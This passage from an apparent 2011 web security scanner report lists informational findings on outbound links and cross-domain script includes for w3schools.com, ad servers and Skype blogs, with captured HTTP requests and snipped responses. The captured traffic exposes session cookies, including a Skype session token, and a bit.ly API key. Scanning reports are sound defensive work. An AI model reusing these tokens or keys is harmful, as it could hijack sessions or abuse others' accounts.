GET /jsref/tryit_view.asp?filename=tryjsref_anchor_rel HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/jsref/tryit.asp?filename=tryjsref_anchor_rel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.16.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:04 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 316
Content-Type: text/html
Cache-control: private

<html>
<body>

<p><a id="func" rel="friend" href="http://www.functravel.com/">Cheap Flights</a></p>

<script type="text/javascript">
document.write("The relationship between the current document
...[SNIP]...

17.111. http://www.w3schools.com/jsref/tryit_view.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /jsref/tryit_view.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /jsref/tryit_view.asp?filename=tryjsref_anchor_charset HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/jsref/tryit.asp?filename=tryjsref_anchor_charset
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.12.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:33:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 574
Content-Type: text/html
Cache-control: private

<html>
<body>

<a id="w3s" charset="ISO-8859-1" href="http://www.w3schools.com/">W3Schools</a><br />

<script type="text/javascript">
document.write("Return charset of link: ");
document.write(
...[SNIP]...
</script>

<a id="google" href="http://www.google.com/">Google</a>
...[SNIP]...

17.112. http://www.w3schools.com/jsref/tryit_view.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /jsref/tryit_view.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /jsref/tryit_view.asp?filename=tryjsref_anchor_hreflang HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/jsref/tryit.asp?filename=tryjsref_anchor_hreflang
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.14.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:33:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 571
Content-Type: text/html
Cache-control: private

<html>
<body>

<a id="w3s" hreflang="en-us" href="http://www.w3schools.com/">W3Schools</a><br />

<script type="text/javascript">
document.write("Return hreflang of link: ");
document.write(doc
...[SNIP]...
</script>

<a id="google" href="http://www.google.no/">Google</a>
...[SNIP]...

17.113. http://www.w3schools.com/tryitbanner.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /tryitbanner.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /tryitbanner.asp?secid=tryjs&rnd=0.4725153 HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/js/tryit.asp?filename=tryjs_text
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.1.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:44 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 1898
Content-Type: text/html
Expires: Mon, 05 Sep 2011 02:30:44 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<div style="width:960px;height:94px;position:relative;margin-left:auto;margin-right:auto;margin:0px;padding:0px;overflow:hidden">
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

18. Cross-domain script include  previous  next
There are 917 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


18.1. http://ad.doubleclick.net/adi/N5371.149925.MARTINIMEDIANETWORK/B5703799.12  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5371.149925.MARTINIMEDIANETWORK/B5703799.12

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N5371.149925.MARTINIMEDIANETWORK/B5703799.12;sz=160x600;click0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/wallstreetoasis.com/ROS/L23/1747216000/Right/Martini/hertz_goldplusrewar_080111_387/hertz_bt_160x600.html/4d686437616b356934616b41434d6658?http://msite.martiniadnetwork.com/action/track/type/0/pid/1811702/sid/7696162854db74d954e7c2/loc/http%3A//www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps/pubclick//Martini/hertz_goldplusrewar_080111_387/pos/Right/page/wallstreetoasis.com/ROS/L23/ord/1747216000?;ord=1747216000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 04 Sep 2011 16:17:10 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 8146
X-XSS-Protection: 1; mode=block

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jul 19 11:02:06 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

18.2. http://afe.specificclick.net/serve/v=5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=76c8b6bd9362121274a3e06817e9

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:30:54 GMT
Vary: Accept-Encoding
Content-Length: 2779
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
<img src="http://cache.specificmedia.com/creative/blank.gif?ts=20110904223054&cmxid=2101.020016144100975458xmc" style="display: none" height="1" width="1" border="0" /><script type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=144&pubId=19240&campId=161441"></script>
...[SNIP]...

18.3. http://blogs.skype.com/de/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /de/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /de/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:13 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 61616
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.4. http://blogs.skype.com/developer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /developer/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /developer/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:08 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 59562
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.5. http://blogs.skype.com/developer/2011/03/longer_playtime_courtesy_of_si.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /developer/2011/03/longer_playtime_courtesy_of_si.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /developer/2011/03/longer_playtime_courtesy_of_si.html HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:11 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 60729
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.6. http://blogs.skype.com/developer/2011/06/breaking_down_the_barriers_one.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /developer/2011/06/breaking_down_the_barriers_one.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /developer/2011/06/breaking_down_the_barriers_one.html HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:10 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 58059
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.7. http://blogs.skype.com/developer/2011/06/bringing_video_to_the_next_wav.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /developer/2011/06/bringing_video_to_the_next_wav.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /developer/2011/06/bringing_video_to_the_next_wav.html HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:09 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 59244
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.8. http://blogs.skype.com/en/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://heartbeat.skype.com/2011/08/paypal_payments_temporarily_un.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: blogs.skype.com
Proxy-Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:05:33 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 61967
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.9. http://blogs.skype.com/en/2005/05/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/05/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2005/05/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:03 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 230490
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.10. http://blogs.skype.com/en/2005/06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/06/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2005/06/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:02 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 377860
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.11. http://blogs.skype.com/en/2005/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/07/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2005/07/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:00 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 594031
Connection: close
Content-Type: text/html; charset=UTF-8

